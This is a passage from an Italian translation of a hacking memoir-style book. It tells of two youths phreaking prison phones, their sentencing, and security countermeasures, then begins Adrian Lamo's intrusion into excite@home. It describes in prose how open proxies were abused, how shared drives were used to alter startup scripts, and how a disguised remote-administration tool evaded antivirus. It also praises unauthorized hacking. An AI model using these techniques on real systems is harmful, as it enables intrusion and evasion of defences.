Quando gli investigatori arrivarono a casa della madre, Co- 
sta non era in casa, ma sua madre sì. “Oh, sì, entrate pure,” dis- 
se loro, sicura che non vi fosse alcun pericolo. 
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Non trovarono alcun oggetto rubato. Questa era la buona no- 
tizia. La cattiva notizia era che trovarono un foglietto di carta ca- 
duto per terra e finito, non visto, sotto al bordo del tappeto. Sul 
foglietto c'era un numero di telefono e alcune cifre che un inve- 
stigatore riconobbe come un Numero seriale elettronico. Un con- 
trollo con la compagnia telefonica rivelò che l'informazione era 
associata a un numero di cellulare che veniva utilizzato illegal- 
mente. 

Costa seppe della perquisizione a casa della madre e decise 
di non farsi trovare: 


Per cinque giorni mi ritrovai in fuga dal Secret Service, che aveva la 
giurisdizione sulle frodi con i cellulari. Ero un fuggitivo. Me ne stet- 
ti a casa di un amico di Seattle, mentre loro erano venuti a cercar- 
mi a casa, fortunatamente la macchina che guidavo era ancora in- 
testata al proprietario precedente, così non fui catturato. 

Il quinto o il sesto giorno, parlai con il mio avvocato, mi presentai 
all'Ufficio per la libertà vigilata insieme a lui e mi consegnai. Fui ar- 
restato e portato via. 

Scappare dal Secret Service, quello fu un momento stressante. 


Anche Matt fu prelevato. I due si ritrovarono in due piani se- 
parati della prigione della Contea di King. 


Jail phreaking 


I ragazzi appresero che questa volta non ci sarebbe stato pro- 
cesso. Una volta concluse le indagini e compilate le carte da par- 
te dell'ufficio del procuratore, la coppia sarebbe finita davanti a 
un giudice federale per violazione della libertà vigilata. Nessun 
processo, nessuna chance di allestire una difesa e non molte spe- 
ranze di ottenere clemenza. 

Nel frattempo sarebbero stati entrambi interrogati ap- 
profonditamente. Conoscevano la procedura: tenere i criminali 
separati e farli cadere in contraddizione quando danno delle ver- 
sioni discordanti. 

Matt e Costa scoprirono che il carcere locale, almeno per lo- 
ro, era un posto più duro in cui trascorrere il tempo di una pri- 
gione federale. “La prigione della contea è la peggiore, come nes- 
sun altro posto. Fui minacciato da un paio di persone,” dice Co- 
sta. “Mi è capitato di venire alle mani. Se non reagisci ti masti- 
cano e ti sputano.” Matt ricorda di essere stato preso a pugni. 
“Credo che fu perché ero stato troppo al telefono. Così imparai 
la lezione.” 

La prigione era dura anche per un altro motivo. Come ricor- 
da Costa: 
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[Era] il non sapere che cosa sarebbe accaduto in seguito, perché era- 
vamo già stati nei guai e sapevamo che ora lo eravamo ancora di più. 
Era la paura di non sapere, più che la paura dei detenuti. Dissero so- 
lo “chiudeteli a chiave” e non c'era né cauzione né deposito. Erava- 
mo sottocustodia federale. Non avevamo idea di dove saremmo an- 
dati da lì ed eravamo sotto chiave per un tempo indeterminato. 


Le carceri di solito hanno due tipi di telefono: i telefoni a pa- 
gamento, dove le conversazioni vengono controllate per assicu- 
rarsi che i detenuti non stiano progettando qualcosa di illegale, 
e i telefoni collegati direttamente all'Ufficio della difesa pubbli- 
ca, in modo che i detenuti possano parlare con i loro avvocati 
d'ufficio. 

Nella prigione di Seattle, le chiamate agli avvocati d'ufficio 
vengono effettuate selezionando un elenco di numeri a due cifre. 
Spiega Matt: “Ma se li chiami dopo l’orario di lavoro cosa ottie- 
ni? Entri nel loro sistema vocale e puoi toccare tutti i tasti a to- 
ni che vuoi”. Iniziò a esplorare il sistema di caselle vocali. 

Fu in grado di identificare il sistema come un Meridian, una 
tipologia che sia lui sia Costa conoscevano bene, e lo programmò 
in modo tale che avrebbe trasferito le sue chiamate a una linea 
esterna. “Installai nel menu un numero otto, che non era fornito 
dal sistema vocale automatico. Da lì potevo chiamare un nume- 
ro locale e digitare un codice a sei cifre che conoscevo. A quel 
punto potevo chiamare in qualsiasi parte del mondo.” 

Anche se i telefoni venivano disattivati alle otto di sera, la li- 
nea degli avvocati difensori veniva lasciata sempre attiva. “Gio- 
cavamo con i telefoni tutta la notte e non c'era nessuno in coda 
perché pensavano che fossero spenti,” dice Costa. “Pensavano so- 
lo che eravamo pazzi a star lì seduti con il telefono. Così funzionò 
perfettamente.” 

Mentre Costa scopriva come fare telefonate all’esterno, an- 
che Matt stava usando il telefono di notte nel suo reparto per con- 
durre alcune esplorazioni per conto suo. Individuò un “numero 
ponte in un vecchio circuito chiuso” di una compagnia telefoni- 
ca della Pennsylvania, che permetteva a entrambi di chiamare un 
numero test della compagnia e parlarsi. 

I due passavano ore a parlarsi ai telefoni non controllati. “Po- 
temmo discutere del nostro caso prima di essere interrogati. Il 
che fu comodo, molto comodo,” dice Costa. E Matt aggiunge: “Di- 
scutemmo all'infinito ciò che dovevamo dire alla controparte. Vo- 
levamo che tutto filasse alla perfezione”. 

Tra i detenuti si sparse la voce che i due ragazzini erano dei 
maghi dei telefoni. 


costa: Diventai quasi grasso perché gli altri detenuti mi davano i lo- 
ro vassoi in cambio delle telefonate gratuite. 
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MATT: Stavo iniziando a dimagrire perché ero nervoso. Stavo lì seduto 
con tutti quei ruffiani e non mi piaceva passar loro queste telefonate. 


Stare in prigione e infrangere la legge facendo telefonate ille- 
gali e concordando le proprie versioni nella speranza di inganna- 
re i pubblici ministeri. Per un hacker una cosa del genere è sem- 
plicemente divertente. Per Matt e Costa, significò rischiare di ri- 
trovarsi con altre imputazioni sommate a quelle che avevano già. 

Alla fine i loro tentativi di colludere non li aiutarono. Le pro- 
ve erano schiaccianti e questa volta si trovarono di fronte a un 
giudice che non li avrebbe lasciati andare con un buffetto. Furo- 
no entrambi condannati a “un anno e un giorno” da scontare in 
una prigione federale, da cui scalare il tempo già trascorso nel 
carcere della contea. Il “giorno extra” di prigione gli fu sostan- 
zialmente d'aiuto. In base alle leggi federali sulle pene detentive, 
quel giorno permetteva loro di essere rilasciati con cinquanta- 
quattro giorni di anticipo per buona condotta. 

I due furono detenuti senza possibilità di pagare cauzione per 
tre mesi e mezzo. Poi ottennero la sospensione della pena, ma 
dovendo sottostare a un insieme severo di restrizioni, finché il 
giudice non avesse deciso una sentenza. Don aveva ragione: que- 
sta volta non c'era stata clemenza. 


Scontare la pena 


Matt fu spedito a Camp Sheridan in Oregon mentre Costa finì 
nel Campo di prigionia federale di Boron, in California. “Era un 
carcere federale perché avevamo violato i termini della libertà vi- 
gilata concessa su un capo di imputazione federale,” dice Costa. 

Nondimeno, non fu esattamente un “periodo duro” per nes- 
suno dei due. Costa: 


Sapevo che mi era andata di lusso. Era una prigione federale con 
una piscina. Nel mezzo del deserto del Mojave, era un posto piace- 
vole. Non avevamo una recinzione, solo una linea gialla nella sab- 
bia. Era uno di questi posti in cui, sai, c'erano stati tre senatori. C'e- 
ra anche il tipo che aveva lanciato una famosa catena di ristoranti 
quand'ero lì. 


Boron era l’ultimo istituto federale con una piscina, e Costa 
in seguito venne a sapere che un servizio televisivo di Barbara 
Walters aveva portato alla chiusura della piscina, dopo che era 
stato rilasciato. Personalmente posso capire che non si spenda- 
no i soldi dei contribuenti per una piscina quando viene costrui- 
ta una nuova prigione, ma non riesco a capire perché se ne deb- 
ba distruggere una già esistente. 
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Nella prigione di Sheridan, Matt scoprì che tra i detenuti c'e- 
ra un ex direttore della Boeing. “Era finito nei guai per una spe- 
cie di appropriazione indebita o un reato da colletto bianco.” Il 
che sembrava in qualche modo ironico. 

Costa e gli altri detenuti di Boron venivano condotti fre- 
quentemente, per mezz'ora attraverso il deserto in un autobus 
rovente della prigione: dovevano fare dei lavoretti alla vicina ba- 
se dell'aeronautica di Edwards. “Mi misero in un capannone del- 
l’esercito dove avevano un server Vax. Non avrei dovuto neanche 
stare nei paraggi di un computer.” Avvisò il sergente. “Gli dissi la 
mia storia e lui mi rispose: ‘Fai pure’.” Costa non perse tempo e 
familiarizzò subito con il computer militare. “Andavo su Irc ogni 
giorno e chattavo mentre ero rinchiuso. Scaricavo Doom ad al- 
tissima velocità. Era fantastico, eccezionale!” 

A un certo punto a Costa fu assegnato il compito di ripulire 
un furgone per operazioni segrete di comunicazione, pieno di di- 
spositivi elettronici sensibili. “Non riuscivo a credere che ci la- 
sciavano fare una cosa del genere.” 

In un certo senso, la loro prigionia sembra un'avventura, qua- 
si uno scherzo. Ma non lo fu. Ogni mese che passarono dentro fu 
un mese di vita sprecato, un mese di istruzione mancata, un mese 
lontano dalle persone che amavano e con cui avrebbero voluto tra- 
scorrere del tempo. Ogni mattina un prigioniero comincia la sua 
giornata chiedendosi se oggi dovrà fare a pugni per difendere se 
stesso o la sua proprietà. Il carcere può essere terrificante. 


Che cosa stanno facendo oggi 


Dieci anni dopo che sono stati rilasciati, i due ragazzi sem- 
brano condurre entrambi vite più comuni. Matt sta lavorando al 
momento per una grossa compagnia a San José come sviluppa- 
tore di applicazioni Java. Costa ha la sua azienda e sembra piut- 
tosto indaffarato a “installare sistemi digitali di sorveglianza e 
dei client audio distribuiti (slimadevices) per le aziende”. Ha tro- 
vato un lavoro per cui è portato; le persone annoiate per i lavori 
che fanno sarebbero invidiose nel sapere che lui, dice, “si diver- 
te ogni minuto”. 


Riflessioni 


Sembra incredibile che al giorno d’oggi gli hacker trovino an- 
cora così facile andarsene a spasso in così tanti siti aziendali. No- 
nostante tutte le storie di intrusioni, le preoccupazioni per la si- 
curezza e la presenza di esperti di sicurezza competenti e pro- 
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fessionali, assunti in pianta stabile o come consulenti da com- 
pagnie grandi e piccole, è scioccante che una coppia di adole- 
scenti sia stata competente a sufficienza da penetrare nei com- 
puter di un tribunale federale, di una grossa catena di alberghi e 
della Boeing Aircraft. 

Credo che la ragione di ciò sia ascrivibile almeno in parte al 
fatto che molti hacker seguono un percorso simile al mio, tra- 
scorrendo un'enorme quantità di tempo a studiare i sistemi infor- 
matici, i sistemi operativi, le applicazioni, il networking e via di- 
cendo. Sono in gran parte autodidatti, ma si formano anche tra- 
mite un accordo di tutoraggio informale ma altamente efficace 
di “condivisione della conoscenza”. Alcuni, appena usciti dalle 
scuole superiori, hanno avuto abbastanza tempo e si sono istrui- 
ti a sufficienza nel campo, da essere maturi per una laurea in 
Scienze dell'hacking. Se il Mit o Cal Tech dovessero istituire una 
laurea del genere, ne conosco diversi che candiderei. 

Non deve stupire che molti consulenti di sicurezza abbiano 
un passato segreto da blackhat (compresi almeno un paio di quel- 
li le cui storie compaiono in queste pagine). Compromettere i si- 
stemi di sicurezza richiede un tipo particolare di struttura men- 
tale, in grado di analizzare attentamente come rendere questi si- 
stemi inefficaci. Chiunque cerchi di entrare in questo campo uni- 
camente a partire da cose apprese in classe avrebbe bisogno co- 
munque di molta esperienza pratica, poiché si troverebbe a com- 
petere con consulenti che hanno iniziato a studiare la materia al- 
l'età di otto o dieci anni. 

Può essere difficile da ammettere, ma la verità è che tutti nel 
campo della sicurezza hanno molto da imparare dagli hacker. I 
quali possono rivelare una debolezza nel sistema con modalità 
che sono imbarazzanti da riconoscere e costose da affrontare. 
Possono infrangere la legge mentre lo fanno, ma forniscono un 
servizio di valore. Di fatto molti “professionisti” della sicurezza 
sono stati hacker nel loro passato. 

Qualche lettore criticherà Kevin Mitnick per queste parole, 
l'hacker di una volta che difende la generazione di hacker di og- 
gi. Ma la verità è che molti attacchi degli hacker hanno la pre- 
ziosa funzione di evidenziare i punti deboli nella sicurezza di una 
compagnia. Se l’hacker non ha causato nessun danno, commes- 
so un furto, o lanciato un attacco che produce un'interruzione 
del servizio, la compagnia ne soffre o ne beneficia nel momento 
in cui è costretta ad affrontare le proprie vulnerabilità? 


Contromisure 


Garantirsi una gestione appropriata della configurazione di 
un sistema è un processo cruciale che non andrebbe ignorato. 
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Anche se si configurano nel modo giusto tutti gli hardware e i 
software al momento dell’installazione e si tengono aggiornate 
tutte le patch di sicurezza essenziali, la configurazione impro- 
pria di un singolo componente può creare una fessura nel muro. 
Ogni organizzazione dovrebbe avere una procedura definita per 
assicurarsi che il personale dell’It addetto all’installazione di 
hardware e software, e il personale delle telecomunicazioni che 
installa i servizi di telefonia, siano formati in modo appropriato. 
E che venga ricordato loro regolarmente, anche tramite test pe- 
.-riodici, che la verifica della sicurezza deve essere un chiodo fis- 
so nel loro modo di pensare e di agire. 

A rischio di apparire — qui e altrove - come semplici promo- 
tori del nostro libro precedente, L'arte dell'inganno fornisce uno 
schema perla formazione dei dipendenti alla consapevolezza del- 
la sicurezza informatica. I sistemi e gli apparecchi dovrebbero 
essere testati sotto il profilo della sicurezza prima di essere mes- 
si in produzione. 

Credo fermamente che affidarsi esclusivamente alle password 
statiche dovrebbe essere una pratica del passato. Bisognerebbe 
implementare delle forme più forti di autenticazione, facendo ri- 
corso a strumenti “fisici” come gli identificativi a tempo o dei si- 
stemi biometrici affidabili, da usare in combinazione con una 
password personale forte - cambiata spesso — per proteggere i si- 
stemi che elaborano e archiviano le informazioni di valore. Usa- 
re una forma di autenticazione più sicura non garantisce che non 
possa essere hackerata, ma almeno innalza il livello di difficoltà. 

Le organizzazioni che continuano a usare solo password sta- 
tiche hanno bisogno di fare formazione e di dare sollecitazioni o 
incentivi frequenti che incoraggino delle pratiche sicure con le 
password. Un regolamento interno efficace sulle password ri- 
chiede agli utenti di costruire delle password sicure che conten- 
gano almeno un numero e un simbolo o un misto di maiuscole e 
minuscole, e di cambiarle periodicamente. 

Un passo ulteriore vuole che ci si assicuri che i dipendenti 
non cedano alla “pigrizia della memoria” scrivendo le password 
e postandole sul loro monitor o nascondendole sotto la tastiera 
o nel cassetto della scrivania, cioè nei posti in cui un ladro di da- 
ti con un minimo di esperienza guarda per primo. Inoltre, una 
buona pratica con le password richiede di non usare mai la stes- 
sa password o una simile su più di un sistema. 


Conclusioni 
Svegliatevi gente. Cambiare le configurazioni prestabilite o 


usare delle password forti può evitare alla tua azienda di subire 
un attacco. 
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Ma qui non si tratta solo di stupidità dell'utente. I produtto- 
ri di software non hanno fatto della sicurezza una priorità mag- 
giore dell’interoperabilità e della funzionalità. Certo, mettono dei 
consigli accurati nelle guide per gli utenti e nelle istruzioni d’in- 
stallazione. C'è un vecchio modo di dire degli ingegneri che reci- 
ta: “Quando non funziona niente, leggi le istruzioni”. Ovviamen- 
te non hai bisogno di una laurea in ingegneria per seguire que- 
sta pessima regola. 

È arrivato il momento che i produttori comincino a farsi un 
po’ più saggi su questo eterno problema. E se i produttori di 
hardware e software iniziassero con il riconoscere che la mag- 
gior parte delle persone non legge la documentazione? Perché al- 
lora non creare un messaggio di allerta per attivare la sicurezza 
o per cambiare le configurazioni automatiche della sicurezza, che 
salta fuori quando l’utente installa il prodotto? Ancora meglio, 
perché non crearlo in modo tale che la sicurezza venga attivata 
automaticamente? Microsoft lo ha fatto di recente - ma non pri- 
ma della fine del 2004 — con l'aggiornamento di sicurezza per le 
versioni Windows Xp Professional e Home Editon con la pub- 
blicazione del Service Pack 2, in cui il firewall incorporato viene 
attivato automaticamente. Perché c’è voluto così tanto? 

Microsoft e gli altri produttori di sistemi operativi avrebbero 
dovuto pensarci molto tempo fa. Un cambiamento semplice co- 
me questo nell’industria potrebbe rendere il cyberspazio un po’ 
più sicuro per tutti noi. 
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5. 
L'hacker Robin Hood 


L'hacking per me ha sempre avuto a che fare più 
con la religione che con la tecnologia. 


Adrian Lamo 


L'hacking è una capacità. Chiunque può acquisirla attraverso 
l’autoformazione. Dal mio punto di vista, hacking è una pratica 
creativa e un'arte. Allo stesso modo in cui gli amanti dello scasso 
cercano di aprire serrature e lucchetti per puro divertimento, così 
gli hacker cercano di aggirare la sicurezza in modi imprevisti. Le 
persone possono hackerare senza infrangere la legge. 

La differenza risiede nella concessione o meno da parte del pro- 
prietario del sistema di un permesso all’hacker perché provi a in- 
filtrare il suo sistema informatico. Esistono diversi modi in cui le 
persone possono hackerare, anche con il permesso della “vittima”. 
È risaputo che alcuni infrangono la legge senza mai essere cattu- 
rati. Alcuni corrono il rischio e trascorrono del tempo in prigione. 
Praticamente tutti nascondono la propria identità dietro a un mo- 
niker, che è la versione online di un nome di fantasia. 

Poi ci sono i pochi come Adrian Lamo, che hackerano senza 
mascherare la loro identità e quando trovano un punto debole 
nella sicurezza di un’'organizzazione glielo comunicano. Sono i 
Robin Hood dell’hacking. Non dovrebbero essere arrestati ma 
osannati. Aiutano le compagnie a svegliarsi prima che un hacker 
malintenzionato faccia dei seri danni all'azienda. 

L'elenco di organizzazioni che secondo il governo federale so- 
no state hackerate da Adrian Lamo è a dir poco impressionante. 
Tra queste vi sono Microsoft, Yahoo!, Mci WorldCom, excite@ho- 
me e compagnie telefoniche come Sbc, Ameritech e Cingular. 

E il venerabile “New York Times”. 

Sì, va bene, Adrian è costato alle aziende dei soldi, ma nean- 
che lontanamente quanto affermato dai pubblici ministeri. 


1 Si veda il comunicato stampa del governo degli Stati Uniti http: 
Ihwww.usdoj.gov/criminal/cybercrime/lamoCharge.htm. 
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Salvataggio 


Adrian Lamo non era il tipico adolescente del tipo “me ne sto 
tutto il giorno al centro commerciale”. Una notte, per esempio, 
era andato insieme ai suoi amici a esplorare un grande complesso 
industriale abbandonato lungo gli argini di un fiume. Senza uno 
scopo particolare in mente, si aggiravano all’interno di un im- 
pianto vasto e decadente, e si persero dopo poco. Erano circa le 
due del mattino quando trovarono la via d’uscita dal labirinto. 
Mentre attraversavano una linea ferroviaria in disuso tra i relit- 
ti dei macchinari industriali arrugginiti, Adrian sentì dei flebili 
lamenti. Anche se i suoi amici volevano solo andare via di lì, la 
curiosità di Adrian era stata stimolata. 

Seguendo il suono del lamento arrivò nei pressi di una tuba- 
tura di scolo sudicia. La luce flebile ne rendeva appena visibili i 
recessi più oscuri, dove un gattino intrappolato gemeva con tut- 
te le sue forze. 

Adrian chiamò dal suo cellulare l'operatore telefonico chie- 
dendo il numero del Dipartimento di polizia. Proprio in quel mo- 
mento il faro di una volante accecò il gruppo. 

I ragazzi erano vestiti con quelli che Adrian descrive come 
“vestiti da esploratore urbano, sai, guanti e soprabiti sudici. Non 
proprio il genere di abbigliamento che ispira fiducia e buona vo- 
lontà in un agente di polizia”. Adrian pensa che come ragazzo 
sembrava un po’ sospetto e “potevamo o non potevamo avere del- 
le cose con noi che avrebbero potuto portarci dentro”, dice. Va- 
rie opzioni scorrevano nella testa di Adrian; avrebbero potuto sot- 
toporsi a una lunga serie di domande e a un possibile fermo, cor- 
rere, oppure... gli venne in mente in piano: 


Feci loro un segnale e dissi: “Ehi, c'è un gatto dentro la grondaia qui. 
Ci sareste di grande aiuto”. Fai un salto a due ore dopo, nessuno di 
noi era stato perquisito, le circostanze sospette dimenticate. 


Dopo l’arrivo di due volanti della polizia e di un veicolo per 
il controllo degli animali, il gattino inzuppato fu messo in salvo 
in una rete attaccata a un lungo palo. La polizia diede il gatto ad 
Adrian, che lo portò a casa, lo pulì e lo chiamò Alibi. I suoi ami- 
ci lo chiamarono Drano. 

Più tardi, Adrian rifletté sull'incontro. Essendo una persona 
che non crede alle coincidenze, è certo che tutti si trovarono esat- 
tamente nel punto in cui si dovevano trovare in quel momento. 
Lui vede le sue esperienze informatiche “quasi trascendentali” 
nello stesso modo: non esistono casualità. 

È interessante che Adrian veda la storia del gattino come un 
parallelo di ciò che fanno gli hacker. Vengono in mente parole co- 
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me “adattarsi”, “improvvisare” e “intuizione”, tutti ingredienti 
fondamentali per districarsi tra le molte trappole e le imboscate 
che ti attendono nei vicoli ciechi e lungo i viali del web. 


Radici 


Nato a Boston, Adrian trascorse gran parte della sua infan- 
zia spostandosi nel New England prima che la famiglia si stabi- 
lisse definitivamente a Washington. Il padre, nato in Colombia, 
scrive storie per bambini e fa traduzioni dallo spagnolo all’ingle- 
se; Adrian lo considera un filosofo nato. Sua madre insegnava in- 
glese ma ora fa la casalinga. “Quando ero piccolo mi portavano 
alle manifestazioni politiche. Mi hanno educato a mettere in di- 
scussione ciò che vedo intorno a me e si sono dati da fare per al- 
largare le mie vedute.” 

Adrian non pensa di rientrare in un profilo demografico spe- 
cifico, anche se pensa che la maggior parte degli hacker faccia 
parte di quella che chiama “la classe media bianca convenziona- 
le”. Una volta ebbi l'onore di incontrare i suoi genitori e mi dis- 
sero che uno dei motivi per cui loro figlio si era dato all’hacking 
era perché diversi hacker lo avevano ispirato. Non se ne fece men- 
zione, ma ebbi l'impressione da Adrian che una di queste perso- 
ne avrei potuto essere io. Probabilmente i suoi genitori avrebbe- 
ro voluto prendermi per il collo. 

All’età di sette anni, Adrian iniziò a smanettare sul computer 
del padre, un Commodore 64. Un giorno era frustrato per un ad- 
venture di solo testo cui stava cercando di giocare. Ogni opzione 
sembrava condurre a un punto morto. Scoprì che mentre cerca- 
va di caricare il programma sul computer e prima di eseguire il 
comando “Run”, c'era un modo in cui poteva istruire il compu- 
ter per generare un listato del codice sorgente del gioco. Il lista- 
to gli rivelò le risposte che stava cercando e riuscì a vincere ra- 
pidamente. 

È risaputo che prima un ragazzo inizia ad apprendere un lin- 
guaggio straniero, più lo acquisisce spontaneamente. Adrian pen- 
sa che lo stesso discorso valga per i computer. La sua teoria è che 
la ragione potrebbe risiedere nel fatto che da giovane il cervello 
deve ancora “strutturarsi”, con la rete dei neuroni che è più mal- 
leabile, veloce ad apprendere e ad adattarsi di quanto non sarà 
nella fase adulta. 

Adrian è cresciuto immerso nel mondo dei computer, li ha 
sempre visti come un'estensione della realtà e quindi li ha sem- 
pre manipolati con facilità. Per lui il computer non era qualcosa 
su cui leggere o per il quale c'era bisogno di manuali volumino- 
si per comprenderlo. Non era uno strumento esterno, come un 
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frigorifero o una macchina, ma una finestra su se stesso. Decise 
che lui poteva elaborare organicamente le informazioni, come fa 
un computer con i programmi. 


Incontri di mezzanotte 


Tra tutti i sistemi informatici delle corporation che ha hacke- 
rato, Adrian considera excite@home la sua vera esperienza da 
007. L'epica nacque quasi per capriccio, quando qualcuno gli sug- 
gerì di dare un’occhiata al sito di @home. Essendo la camera di 
compensazione di tutti i servizi Internet via cavo degli Stati Uni- 
ti, Adrian era sicuro che era ben protetta e che non sarebbe sta- 
to il caso di perderci del tempo. Ma se fosse riuscito a penetrar- 
vi, avrebbe potuto accedere a informazioni chiave su ogni uten- 
te del cavo degli Stati Uniti. 

Oggi gli hacker scoprono che Google può essere sorprenden- 
temente d'aiuto per rendere visibili gli obiettivi possibili di un at- 
tacco, rivelando informazioni utili su di loro. Adrian riesuma mol- 
te delle sue prime. tecniche di hacking inserendo in Google una 
serie di parole chiave che lo conducono spesso a siti contenenti 
alcuni bachi di configurazione. 

E così collegò il suo computer portatile alla presa di una re- 
te aperta nella sala studenti di un'università di Philadelphia e ri- 
chiese la pagina web di excite@home. La sala studenti era un am- 
biente familiare per lui: qualsiasi spazio usato da molte persone, 
una postazione Internet ad accesso pubblico o un punto d’accesso 
wireless aperto, sono tutti spazi che forniscono a un hacker un 
modo semplice ed efficace per occultare la sua provenienza. Ri- 
costruire la vera identità di una persona che usa i punti d’acces- 
so a Internet in modo casuale è estremamente difficile. 

L'attitudine mentale di Adrian è di partire immedesimandosi 
nei processi mentali della persona che ha progettato il program- 
ma o la rete che sta attaccando, usando la sua conoscenza degli 
schemi e delle pratiche standard più usate dagli architetti di rete. 
E molto bravo a sfruttare i server proxy — sistemi dedicati a far pas- 
sare il traffico tra la rete interna e le reti “non fidate” come Inter- 
net — che non sono ben configurati. Il proxy esamina ogni richie- 
sta di connessione secondo le regole che gli sono state date. 

Quando un amministratore di rete svolge in modo approssi- 
mativo il lavoro di configurazione dei server proxy dell'azienda, 
chiunque sia in grado di collegarsi al proxy può riuscire a “infi- 
larsi nel tunnel” per arrivare alla rete interna dell'azienda che do- 
vrebbe essere sicura: 

Per un hacker, un “proxy aperto” di questo genere è un'isti- 
gazione a delinquere perché gli permette di apparire come se stes- 
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se facendo delle richieste al pari di un qualsiasi impiegato del- 
l'azienda: da dentro la rete locale dell'azienda. 

Da quella sala studenti dell'università, Adrian scoprì un proxy 
mal configurato che spalancava le porte a pagine web interne di 
diversi reparti di excite@home. Nella sezione dell’Help di una di 
queste, inviò una domanda su alcuni problemi di collegamento 
che stava avendo. La risposta che ottenne conteneva la Url di una 
piccola parte del sistema progettata per l'assistenza tecnica del 
settore It. Analizzando questa Url, Adrian fu in grado di entrare 
in altre divisioni della compagnia che facevano uso della stessa 
tecnologia. Non gli fu chiesta alcuna autenticazione: il sistema 
era stato progettato a partire dall'assunto che chiunque potesse 
richiedere degli indirizzi in queste parti del sito doveva essere un 
dipendente o un’altra persona autorizzata, una premessa incer- 
ta così diffusa che viene soprannominata con un eufemismo: si- 
curezza come vaghezza. 

Come mossa seguente, visitò un sito ben noto tra gli esplora- 
tori del cybespazio: netcraft.com. Adrian inserì dei nomi di do- 
minio parziali, e Netcraft gli restituì una lista di server di tipo E, 
mostrandoglieli come macchine Solaris su cui girava il software 
Apache per i web server. 

Mentre Adrian continuava l'esplorazione, scoprì che il Cen- 
tro delle operazioni di rete della compagnia offriva un sistema di 
supporto tecnico che permetteva ai dipendenti autorizzati di leg- 
gere le specifiche dei clienti che richiedevano assistenza, del ti- 
po: “Aiuto, non riesco a usare l'account”, e quant'altro. Limpie- 
gato chiedeva a volte al cliente di fornire il suo nome utente e 
password sentendosi al sicuro perché tutto questo avveniva die- 
tro al firewall della corporation; l'informazione veniva poi inclu- 
sa nella scheda che certificava i problemi. 

Adrian scoprì delle cose che, dice, “erano rivelatrici”. Tra i te- 
sori c'erano i documenti con i nomi e le password dei clienti, le 
specifiche della procedura di gestione delle schede problematiche 
e le lamentele degli utenti interni sui problemi che avevano con i 
loro computer. Trovò anche uno script per generare un “cookie di 
autenticazione”che avrebbe permesso a un tecnico di autenticarsi 

‘come un titolare di un qualsiasi account e di identificare e risol- 
vere un problema senza richiedere al cliente la password. 

Una nota su una scheda attirò l’attenzione di Adrian. Mo- 
strava il caso di un cliente che oltre un anno prima aveva chiesto 
aiuto in relazione a informazioni personali, contenenti anche dei 
numeri di carta di credito, che gli erano state sottratte da qual- 
cuno su una Internet Relay Chat. La nota interna affermava che 
i “tech” (i tecnici) avevano deciso che non era un loro problema 
e non interessava loro rispondere. In pratica avevano scaricato il 
poveraccio. Adrian chiamò l'uomo a casa fingendo di essere un 
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tecnico della compagnia e disse: “Ehi, non dovrei lavorare su que- 
sta pratica, ma ero curioso di sapere se ha mai ricevuto una ri- 
sposta da noi”. Luomo rispose che non era mai stato richiama- 
to. Adrian gli girò rapidamente la risposta corretta con la docu- 
mentazione interna e la discussione che riguardava la sua prati- 
ca irrisolta: È 


Mi sentii soddisfatto per questo perché voglio credere in un univer- 
so dove un qualcosa di così improbabile come ritrovarsi la propria 
banca dati rubata da qualcuno su una chat Irc, può essere spiegato 
un anno dopo da parte di un intruso che ha compromesso la com- 
pagnia che all’inizio credevi ti avrebbe aiutato. 


A questo punto, il proxy aperto che gli aveva permesso di en- 
trare non funzionava più. Non sapeva bene perché, ma non pote- 
va più accedervi. Iniziò a cercare un’altra strada. Il metodo che riu- 
scì a escogitare fu, secondo le sue parole, “completamente nuovo”. 

Il primo piede nella porta riuscì a infilarlo facendo quello che 
viene chiamata una “ricerca rovesciata del Dns”: usare un indiriz- 
zo Ip per trovare il nome corrispondente dell’host. (Se digitate nel 
vostro browser la richiesta di andare al sito www.defensi- 
vethinking.com, la richiesta viene indirizzata a un Nome di domi- 
nio del server, o Dns, che traduce quel nome in un indirizzo che può 
essere usato su Internet per instradare la vostra richiesta, in questo 
caso il 209.151.246.5. La tecnica usata da Adrian ribalta questo pro- 
cesso: chi attacca inserisce un indirizzo Ip e gli viene fornito il no- 
me di dominio dello strumento cui appartiene l'indirizzo.) 

Aveva molti indirizzi da analizzare, la maggior parte dei qua- 
li non restituì nulla di interessante. Alla fine, in ogni caso, ne trovò 
uno conun nome corrispondente, dialup00.corp.home.net, e mol- 
ti altri che iniziavano con “dialup”. Pensò che questi erano host 
usati dagli impiegati per entrare nel network della corporation 
quando si trovavano fuori sede. 

Scoprì presto che questi numeri di dial-up venivano usati da 
dipendenti che lavoravano ancora con computer dotati di vec- 
chie versioni di sistemi operativi, versioni antiche come Windows 
98. E molti degli utenti del dial-up avevano delle “sezioni aper- 
te”, che permettevano un accesso remoto ad alcune directory o 
all'intero hard disk senza password di lettura o di scrittura. Adrian 
realizzò che poteva apportare dei cambiamenti agli script di av- 
vio del sistema operativo copiando dei file nelle sezioni, in mo- 
do che queste avrebbero eseguito dei comandi scelti da lui. Do- 
po aver sovrascritto alcuni file di avvio specifici con la sua ver- 
sione, capì che avrebbe dovuto aspettare che il sistema fosse riav- 
viato prima che i suoi comandi fossero eseguiti. Ma Adrian sa es- 
sere paziente. 
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La pazienza alla fine portò i suoi frutti e Adrian passò alla 
mossa successiva: l'installazione di un Trojan di accesso remoto 
(o “Rat”). Ma per farlo non si servì di nessuno dei Trojan svilup- 
pati dagli hacker comunemente disponibili, come quelli che gli 
altri intrusi utilizzano per scopi maligni. I programmi antivirus, 
così diffusi al giorno d'oggi, vengono scritti per riconoscere le 
backdoor e i Trojan più comuni e per metterli in quarantena al- 
l'istante. Per aggirare questo meccanismo, Adrian ricorse a uno 
strumento legittimo progettato per l’uso da parte di amministra- 
tori di rete e di sistema, un software commerciale per l'’ammini- 
strazione remota, che modificò leggermente in modo che fosse 
invisibile all'utente. 

Se i prodotti antivirus cercano un tipo di software per l’ac- 
cesso remoto il cui uso è noto nel mondo underground degli 
hacker, essi non cercano i software per l’accesso remoto svilup- 
pati da altre aziende del software, basandosi sull’assunto che que- 
sti prodotti vengono usati in modo legittimo (e anche, suppon- 
go, perché azienda sviluppatrice del software X potrebbe far lo- 
ro causa se il software antivirus trattasse il loro prodotto come 
maligno e lo bloccasse). Personalmente ritengo che non sia una 
buona idea. I prodotti antivirus dovrebbero allertare l'utente su 
ciascun prodotto che potrebbe essere utilizzato in modo maligno 
e lasciare all’utente la decisione se esso sia stato installato legit- 
timamente o meno. Sfruttando questa debolezza, Adrian riesce 
spesso a installare dei Rat legittimi che aggirano la capacità di 
individuarli dei programmi antivirus. 

Una volta che ebbe installato il Rat sul computer dei dipen- 
